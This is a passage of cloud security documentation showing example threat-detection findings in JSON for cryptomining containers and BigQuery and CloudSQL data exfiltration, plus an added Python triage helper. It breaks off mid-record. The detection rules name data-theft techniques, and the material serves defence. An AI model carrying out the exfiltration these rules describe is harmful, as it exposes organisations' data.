    "parentName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parentDisplayName": "PARENT_NAME",
    "type": "google.cloud.resourcemanager.Project",
    "displayName": "PROJECT_ID"
  }
}

Execution: Cryptomining Docker Image

{
  "finding": {
    "access": {
      "callerIpGeo": {},
      "serviceName": "run.googleapis.com",
      "methodName": "/Services.DeleteService"
    },
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/global/findings/FINDING_ID",
    "category": "Execution: Cryptomining Docker Image",
    "chokepoint": {},
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "contacts": {
      "security": {
        "contacts": [
          {"email": "EMAIL_ADDRESS"}
        ]
      }
    },
    "containers": [
      {"imageId": "CONTAINER_IMAGE_ID", "createTime": "1970-01-01T00:00:00Z"}
    ],
    "createTime": "2025-05-06T01:06:10.340Z",
    "database": {},
    "dataProtectionKeyGovernance": {},
    "eventTime": "2025-05-06T01:06:09.037Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "logEntries": [
      {
        "cloudLoggingEntry": {
          "insertId": "INSERT_ID",
          "logId": "cloudaudit.googleapis.com/system_event",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": "2025-05-06T01:05:31.417999Z"
        }
      }
    ],
    "mitreAttack": {
      "primaryTactic": "EXECUTION",
      "primaryTechniques": ["DEPLOY_CONTAINER"]
    },
    "mute": "UNDEFINED",
    "muteInfo": {
      "staticMute": {"state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z"}
    },
    "muteUpdateTime": "1970-01-01T00:00:00Z",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "securityPosture": {},
    "severity": "HIGH",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "displayName": "PROJECT_ID",
    "type": "google.cloud.resourcemanager.Project",
    "cloudProvider": "GOOGLE_CLOUD_PLATFORM",
    "service": "cloudresourcemanager.googleapis.com",
    "gcpMetadata": {
      "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "projectDisplayName": "PROJECT_ID",
      "parent": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
      "parentDisplayName": "FOLDER_NAME",
      "folders": [
        {
          "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
          "resourceFolderDisplayName": "FOLDER_NAME"
        }
      ],
      "organization": "organizations/ORGANIZATION_ID"
    },
    "resourcePath": {
      "nodes": [
        {"nodeType": "GCP_PROJECT", "id": "projects/PROJECT_NUMBER", "displayName": "PROJECT_ID"},
        {"nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_NAME"},
        {"nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID"}
      ]
    },
    "resourcePathString": "organizations/ORGANIZATION_ID/folders/FOLDER_NUMBER/projects/PROJECT_NUMBER"
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": {
      "ruleName": "cloud_run_cryptomining_docker_images"
    },
    "detectionPriority": "HIGH",
    "affectedResources": [
      {"gcpResourceName": "//run.googleapis.com/namespaces/PROJECT_ID/services/SERVICE_NAME"},
      {"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"}
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {"seconds": "1746493531", "nanos": 417999000},
          "insertId": "INSERT_ID",
          "logId": "cloudaudit.googleapis.com/system_event"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1610/"
      },
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "LINK_TO_LOG_QUERY"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}

Exfiltration: BigQuery Data Exfiltration

This finding can include one of two possible subrules:

  • exfil_to_external_table, with a severity of HIGH.
  • vpc_perimeter_violation, with a severity of LOW.

The following example shows the JSON for subrule exfil_to_external_table.

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP",
      "callerIpGeo": { "regionCode": "REGION_CODE" },
      "serviceName": "bigquery.googleapis.com",
      "methodName": "google.cloud.bigquery.v2.JobService.InsertJob"
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Exfiltration: BigQuery Data Exfiltration",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "createTime": "2023-05-30T15:49:59.709Z",
    "database": {},
    "eventTime": "2023-05-30T15:49:59.432Z",
    "exfiltration": {
      "sources": [
        { "name": "//bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID/tables/TABLE_ID" }
      ],
      "targets": [
        { "name": "//bigquery.googleapis.com/projects/TARGET_PROJECT_ID/datasets/TARGET_DATASET_ID/tables/TARGET_TABLE_ID" }
      ]
    },
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "EXFILTRATION",
      "primaryTechniques": [ "EXFILTRATION_OVER_WEB_SERVICE", "EXFILTRATION_TO_CLOUD_STORAGE" ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "HIGH",
    "state": "ACTIVE",
    "vulnerability": {}
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/folders/FOLDER_ID",
    "parent_display_name": "FOLDER_NAME",
    "type": "google.cloud.resourcemanager.Project",
    "folders": [
      {
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_ID",
        "resourceFolderDisplayName": "FOLDER_NAME"
      }
    ]
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": {
      "technique": "org_exfiltration",
      "indicator": "audit_log",
      "ruleName": "big_query_exfil",
      "subRuleName": "exfil_to_external_table"
    },
    "detectionPriority": "HIGH",
    "affectedResources": [
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": { "seconds": "1685461795", "nanos": 341527000 },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {
      "dataExfiltrationAttempt": {
        "jobState": "SUCCEEDED",
        "jobLink": "https://console.cloud.google.com/bigquery?j=bq:BIGQUERY_JOB_LOCATION:BIGQUERY_JOB_ID&project=PROJECT_ID&page=queryresults",
        "job": {
          "projectId": "PROJECT_ID",
          "jobId": "BIGQUERY_JOB_ID",
          "location": "BIGQUERY_JOB_LOCATION"
        },
        "query": "QUERY",
        "sourceTables": [
          {
            "resourceUri": "https://console.cloud.google.com/bigquery?p=PROJECT_ID&d=DATASET_ID&t=TABLE_ID&page=table",
            "projectId": "PROJECT_ID",
            "datasetId": "DATASET_ID",
            "tableId": "TABLE_ID"
          }
        ],
        "destinationTables": [
          {
            "resourceUri": "https://console.cloud.google.com/bigquery?p=TARGET_PROJECT_ID&d=TARGET_DATASET_ID&t=TARGET_TABLE_ID&page=table",
            "projectId": "TARGET_PROJECT_ID",
            "datasetId": "TARGET_DATASET_ID",
            "tableId": "TARGET_TABLE_ID"
          }
        ],
        "userEmail": "e2etest@PROJECT_ID.iam.gserviceaccount.com"
      },
      "principalEmail": "PRINCIPAL_EMAIL"
    },
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1567/002/"
      },
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-05-30T15:49:55.341527Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project=PROJECT_ID"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
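The fields an analyst actually routes on (rule, subrule, severity, principal, exfiltration sources and targets) sit in different places in the finding JSON, and the examples on this page vary in shape: one uses a "findings" top-level key, and some nest sourceProperties under the finding rather than beside it. The following Python is an added example, not Google's code and not part of the original page: it normalises a notification in the shape shown above into a flat triage record and checks whether an exfiltration finding moved data out of its source project. The sample finding is constructed from the page's placeholders, and the route() policy is an assumption for the example rather than any Security Command Center setting.

```python
"""Triage helper for Event Threat Detection finding notifications.

Added example, not Google's code. Flattens a finding in the JSON shape shown on
this page into a record a SOAR or ticketing pipeline can route on.
"""
import json
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: a trimmed "Exfiltration: BigQuery Data Exfiltration" finding
# (subrule exfil_to_external_table) built from the page's placeholder values.
SAMPLE_NOTIFICATION = json.dumps({
    "finding": {
        "category": "Exfiltration: BigQuery Data Exfiltration",
        "severity": "HIGH",
        "state": "ACTIVE",
        "eventTime": "2023-05-30T15:49:59.432Z",
        "access": {
            "principalEmail": "PRINCIPAL_EMAIL",
            "callerIp": "IP",
            "serviceName": "bigquery.googleapis.com",
            "methodName": "google.cloud.bigquery.v2.JobService.InsertJob",
        },
        "exfiltration": {
            "sources": [{"name": "//bigquery.googleapis.com/projects/PROJECT_ID"
                                 "/datasets/DATASET_ID/tables/TABLE_ID"}],
            "targets": [{"name": "//bigquery.googleapis.com/projects/TARGET_PROJECT_ID"
                                 "/datasets/TARGET_DATASET_ID/tables/TARGET_TABLE_ID"}],
        },
    },
    "resource": {"name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"},
    "sourceProperties": {
        "detectionCategory": {"ruleName": "big_query_exfil",
                              "subRuleName": "exfil_to_external_table"},
        "contextUris": {"mitreUri": {"url": "https://attack.mitre.org/techniques/T1567/002/"}},
    },
})


@dataclass
class TriageRecord:
    category: str
    severity: str
    rule: str
    subrule: Optional[str]
    principal: Optional[str]
    method: Optional[str]
    sources: List[str] = field(default_factory=list)
    targets: List[str] = field(default_factory=list)
    mitre_url: Optional[str] = None


def parse_finding(raw: str) -> TriageRecord:
    """Pull the fields an analyst triages on out of a notification payload."""
    doc = json.loads(raw)
    # One example on this page uses "findings" as the top-level key; accept both.
    finding = doc.get("finding") or doc.get("findings") or {}
    # sourceProperties appears beside the finding in some examples and inside it in others.
    props = doc.get("sourceProperties") or finding.get("sourceProperties") or {}
    access = finding.get("access") or {}
    exfil = finding.get("exfiltration") or {}
    detection = props.get("detectionCategory") or {}
    mitre = (props.get("contextUris") or {}).get("mitreUri") or {}
    return TriageRecord(
        category=finding.get("category", ""),
        severity=finding.get("severity", "UNKNOWN"),
        rule=detection.get("ruleName", ""),
        subrule=detection.get("subRuleName"),
        principal=access.get("principalEmail"),
        method=access.get("methodName"),
        sources=[s["name"] for s in exfil.get("sources", []) if "name" in s],
        targets=[t["name"] for t in exfil.get("targets", []) if "name" in t],
        mitre_url=mitre.get("url"),
    )


def _project_of(resource_name: str) -> Optional[str]:
    """Project segment of a //service.googleapis.com/projects/... name; None for gs:// etc."""
    parts = resource_name.split("/")
    if "projects" in parts:
        idx = parts.index("projects")
        if idx + 1 < len(parts):
            return parts[idx + 1]
    return None


def crosses_project_boundary(record: TriageRecord) -> bool:
    """True when any target is outside the project(s) the sources belong to."""
    source_projects = {_project_of(s) for s in record.sources} - {None}
    return any(_project_of(t) not in source_projects for t in record.targets)


def route(record: TriageRecord) -> str:
    """Routing policy assumed for this example: page on HIGH/CRITICAL findings whose
    data left the source project, open a ticket for everything else."""
    if record.severity in ("HIGH", "CRITICAL") and crosses_project_boundary(record):
        return "page-oncall"
    return "ticket"


if __name__ == "__main__":
    rec = parse_finding(SAMPLE_NOTIFICATION)
    print(rec.category, rec.rule, rec.subrule, route(rec))
```

For the constructed sample, parse_finding returns rule big_query_exfil with subrule exfil_to_external_table, the target table lives in TARGET_PROJECT_ID rather than the source's PROJECT_ID, so crosses_project_boundary is true and the record routes to page-oncall. A vpc_perimeter_violation subrule arrives with severity LOW and therefore routes to a ticket under the same policy.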

Exfiltration: BigQuery Data Extraction

This finding isn't available for project-level activations.

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resource_name": "//bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID/tables/TABLE_ID",
    "state": "ACTIVE",
    "category": "Exfiltration: BigQuery Data Extraction",
    "sourceProperties": {
      "affectedResources": [
        { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
      ],
      "detectionCategory": {
        "technique": "storage_bucket_exfiltration",
        "indicator": "audit_log",
        "ruleName": "big_query_exfil",
        "subRuleName": "exfil_to_cloud_storage"
      },
      "detectionPriority": "LOW",
      "sourceId": {
        "projectNumber": "PROJECT_NUMBER",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1567/002/"
        },
        "cloudLoggingQueryUri": [
          { "displayName": "Cloud Logging Query Link", "url": "LOGGING_LINK" }
        ],
        "relatedFindingUri": {
          "displayName": "Related BigQuery Exfiltration Extraction findings",
          "url": "RELATED_FINDINGS_LINK"
        }
      },
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "PROJECT_ID",
            "resourceContainer": "projects/PROJECT_ID",
            "timestamp": { "seconds": "0", "nanos": 0.0 },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "extractionAttempt": {
          "jobLink": "https://console.cloud.google.com/bigquery?j=JOB_ID&project=SOURCE_PROJECT_ID&page=queryresults",
          "job": {
            "projectId": "SOURCE_PROJECT_ID",
            "jobId": "JOB_ID",
            "location": "US"
          },
          "sourceTable": {
            "projectId": "DESTINATION_PROJECT_ID",
            "datasetId": "DATASET_ID",
            "tableId": "TABLE_ID",
            "resourceUri": "FULL_URI"
          },
          "destinations": [
            {
              "originalUri": "gs://TARGET_STORAGE_BUCKET_NAME/TARGET_FILE_NAME",
              "collectionType": "STORAGE_BUCKET",
              "collectionName": "TARGET_STORAGE_BUCKET_NAME",
              "objectName": "TARGET_FILE_NAME"
            }
          ]
        },
        "principalEmail": "PRINCIPAL_EMAIL"
      },
      "findingId": "FINDING_ID"
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2022-03-31T21:22:11.359Z",
    "createTime": "2022-03-31T21:22:12.689Z",
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "mute": "UNDEFINED",
    "findingClass": "THREAT",
    "mitreAttack": {
      "primaryTactic": "EXFILTRATION",
      "primaryTechniques": [ "EXFILTRATION_OVER_WEB_SERVICE", "EXFILTRATION_TO_CLOUD_STORAGE" ]
    },
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP",
      "callerIpGeo": {},
      "serviceName": "bigquery.googleapis.com",
      "methodName": "google.cloud.bigquery.v2.JobService.InsertJob"
    },
    "exfiltration": {
      "sources": [
        { "name": "//bigquery.googleapis.com/projects/SOURCE_PROJECT_ID/datasets/DATASET_ID/tables/TABLE_ID" }
      ],
      "targets": [
        { "name": "TARGET_STORAGE_URI" }
      ]
    }
  },
  "resource": {
    "name": "//bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID/tables/TABLE_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER/datasets/DATASET_ID",
    "parentDisplayName": "PROJECT_ID:DATASET_ID",
    "type": "google.cloud.bigquery.Table",
    "folders": [
      {
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
        "resourceFolderDisplayName": "FOLDER_NAME"
      }
    ],
    "displayName": "PROJECT_ID:DATASET_ID.TABLE_ID"
  }
}

Exfiltration: BigQuery Data to Google Drive

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resource_name": "//bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID/tables/TABLE_ID",
    "state": "ACTIVE",
    "category": "Exfiltration: BigQuery Data to Google Drive",
    "sourceProperties": {
      "affectedResources": [
        { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
      ],
      "detectionCategory": {
        "technique": "google_drive_exfiltration",
        "indicator": "audit_log",
        "ruleName": "big_query_exfil",
        "subRuleName": "exfil_to_google_drive"
      },
      "detectionPriority": "LOW",
      "sourceId": {
        "projectNumber": "PROJECT_NUMBER",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1567/002/"
        },
        "cloudLoggingQueryUri": [
          { "displayName": "Cloud Logging Query Link", "url": "LOGGING_LINK" }
        ],
        "relatedFindingUri": {
          "displayName": "Related BigQuery Exfiltration to Google Drive findings",
          "url": "RELATED_FINDINGS_LINK"
        }
      },
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "PROJECT_ID",
            "resourceContainer": "projects/PROJECT_ID",
            "timestamp": { "seconds": "0", "nanos": 0.0 },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "extractionAttempt": {
          "jobLink": "https://console.cloud.google.com/bigquery?j=JOB_ID&project=SOURCE_PROJECT_ID&page=queryresults",
          "job": {
            "projectId": "SOURCE_PROJECT_ID",
            "jobId": "JOB_ID",
            "location": "US"
          },
          "sourceTable": {
            "projectId": "DESTINATION_PROJECT_ID",
            "datasetId": "DATASET_ID",
            "tableId": "TABLE_ID",
            "resourceUri": "FULL_URI"
          },
          "destinations": [
            {
              "originalUri": "gdrive://TARGET_GOOGLE_DRIVE_FOLDER/TARGET_GOOGLE_DRIVE_FILE_NAME",
              "collectionType": "GDRIVE",
              "collectionName": "TARGET_GOOGLE_DRIVE_FOLDER",
              "objectName": "TARGET_GOOGLE_DRIVE_FILE_NAME"
            }
          ]
        },
        "principalEmail": "PRINCIPAL_EMAIL"
      },
      "findingId": "FINDING_ID"
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2022-03-31T21:20:18.408Z",
    "createTime": "2022-03-31T21:20:18.715Z",
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "mute": "UNDEFINED",
    "findingClass": "THREAT",
    "mitreAttack": {
      "primaryTactic": "EXFILTRATION",
      "primaryTechniques": [ "EXFILTRATION_OVER_WEB_SERVICE", "EXFILTRATION_TO_CLOUD_STORAGE" ]
    },
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP",
      "callerIpGeo": {},
      "serviceName": "bigquery.googleapis.com",
      "methodName": "google.cloud.bigquery.v2.JobService.InsertJob"
    },
    "exfiltration": {
      "sources": [
        { "name": "//bigquery.googleapis.com/projects/SOURCE_PROJECT_ID/datasets/DATASET_ID/tables/TABLE_ID" }
      ],
      "targets": [
        { "name": "TARGET_GOOGLE_DRIVE_URI" }
      ]
    }
  },
  "resource": {
    "name": "//bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID/tables/TABLE_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER/datasets/DATASET_ID",
    "parentDisplayName": "PROJECT_ID:DATASET_ID",
    "type": "google.cloud.bigquery.Table",
    "folders": [
      {
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
        "resourceFolderDisplayName": "FOLDER_NAME"
      }
    ],
    "displayName": "PROJECT_ID:DATASET_ID.TABLE_ID"
  }
}

Exfiltration: CloudSQL Data Exfiltration

This finding isn't available for project-level activations.

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resource_name": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME",
    "state": "ACTIVE",
    "category": "Exfiltration: CloudSQL Data Exfiltration",
    "sourceProperties": {
      "sourceId": {
        "projectNumber": "PROJECT_NUMBER",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "technique": "storage_bucket_exfiltration",
        "indicator": "audit_log",
        "ruleName": "cloudsql_exfil",
        "subRuleName": "export_to_public_gcs"
      },
      "detectionPriority": "HIGH",
      "affectedResources": [
        { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" },
        { "gcpResourceName": "//storage.googleapis.com/TARGET_STORAGE_BUCKET_NAME" },
        { "gcpResourceName": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME" }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "PROJECT_ID",
            "resourceContainer": "projects/PROJECT_ID",
            "timestamp": { "seconds": "0", "nanos": 0.0 },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "exportToGcs": {
          "principalEmail": "PRINCIPAL_EMAIL",
          "cloudsqlInstanceResource": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME",
          "gcsUri": "gs://TARGET_STORAGE_BUCKET_NAME/TARGET_FILE_NAME",
          "bucketAccess": "PUBLICLY_ACCESSIBLE",
          "bucketResource": "//storage.googleapis.com/TARGET_STORAGE_BUCKET_NAME",
          "exportScope": "WHOLE_INSTANCE"
        }
      },
      "findingId": "FINDING_ID",
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1567/002/"
        },
        "cloudLoggingQueryUri": [
          { "displayName": "Cloud Logging Query Link", "url": "LOGGING_LINK" }
        ],
        "relatedFindingUri": {
          "displayName": "Related CloudSQL Exfiltration findings",
          "url": "RELATED_FINDINGS_LINK"
        }
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-10-11T16:32:59.828Z",
    "createTime": "2021-10-11T16:33:00.229Z",
    "severity": "HIGH",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "mute": "UNDEFINED",
    "findingClass": "THREAT",
    "mitreAttack": {
      "primaryTactic": "EXFILTRATION",
      "primaryTechniques": [ "EXFILTRATION_OVER_WEB_SERVICE", "EXFILTRATION_TO_CLOUD_STORAGE" ]
    },
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP",
      "callerIpGeo": {},
      "serviceName": "cloudsql.googleapis.com",
      "methodName": "cloudsql.instances.export"
    },
    "exfiltration": {
      "sources": [
        {
          "name": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME",
          "components": []
        }
      ],
      "targets": [
        {
          "name": "//storage.googleapis.com/TARGET_STORAGE_BUCKET_NAME",
          "components": [ "TARGET_FILE_NAME" ]
        }
      ]
    }
  },
  "resource": {
    "name": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.cloud.sql.Instance",
    "folders": [
      {
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
        "resourceFolderDisplayName": "FOLDER_NAME"
      }
    ],
    "displayName": "INSTANCE_NAME"
  }
}

Exfiltration: CloudSQL Over-Privileged Grant

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resource_name": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME",
    "state": "ACTIVE",
    "category": "Exfiltration: CloudSQL Over-Privileged Grant",
    "sourceProperties": {
      "sourceId": {
        "projectNumber": "PROJECT_NUMBER",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "ruleName": "cloudsql_exfil",
        "subRuleName": "user_granted_all_permissions"
      },
      "detectionPriority": "LOW",
      "affectedResources": [
        { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" },
        { "gcpResourceName": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME" }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "PROJECT_ID",
            "resourceContainer": "projects/PROJECT_ID",
            "timestamp": { "seconds": "0", "nanos": 0.0 },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "findingId": "FINDING_ID",
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1567/002/"
        },
        "cloudLoggingQueryUri": [
          { "displayName": "Cloud Logging Query Link", "url": "LOGGING_LINK" }
        ],
        "relatedFindingUri": {
          "displayName": "Related CloudSQL Exfiltration findings",
          "url": "RELATED_FINDINGS_LINK"
        }
      }
    },
    "eventTime": "2022-01-19T21:36:07.901Z",
    "createTime": "2022-01-19T21:36:08.695Z",
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "mute": "UNDEFINED",
    "findingClass": "THREAT",
    "mitreAttack": {
      "primaryTactic": "EXFILTRATION",
      "primaryTechniques": [ "EXFILTRATION_OVER_WEB_SERVICE" ]
    },
    "database": {
      "displayName": "DATABASE_NAME",
      "userName": "USER_NAME",
      "query": "QUERY",
      "grantees": [ "GRANTEE" ]
    },
    "access": {
      "serviceName": "cloudsql.googleapis.com",
      "methodName": "cloudsql.instances.query"
    }
  },
  "resource": {
    "name": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudsql.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.cloud.sql.Instance",
    "folders": [
      {
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
        "resourceFolderDisplayName": "FOLDER_ID"
      }
    ],
    "displayName": "INSTANCE_NAME"
  }
}

Exfiltration: CloudSQL Restore Backup to External Organization

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resource_name": "//cloudsql.googleapis.com/projects/SOURCE_PROJECT_ID/instances/SOURCE_INSTANCE_NAME/backupRuns/BACKUP_ID",
    "state": "ACTIVE",
    "category": "Exfiltration: CloudSQL Restore Backup to External Organization",
    "sourceProperties": {
      "sourceId": {
        "projectNumber": "SOURCE_PROJECT_NUMBER",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "technique": "backup_exfiltration",
        "indicator": "audit_log",
        "ruleName": "cloudsql_exfil",
        "subRuleName": "restore_to_external_instance"
      },
      "detectionPriority": "HIGH",
      "affectedResources": [
        { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/SOURCE_PROJECT_NUMBER" },
        { "gcpResourceName": "//cloudsql.googleapis.com/projects/SOURCE_PROJECT_ID/instances/SOURCE_INSTANCE_NAME" },
        { "gcpResourceName": "//cloudsql.googleapis.com/projects/TARGET_PROJECT_ID/instances/TARGET_INSTANCE_NAME" }
      ],
      "evidence": [
        {
          "sourceLogId": {
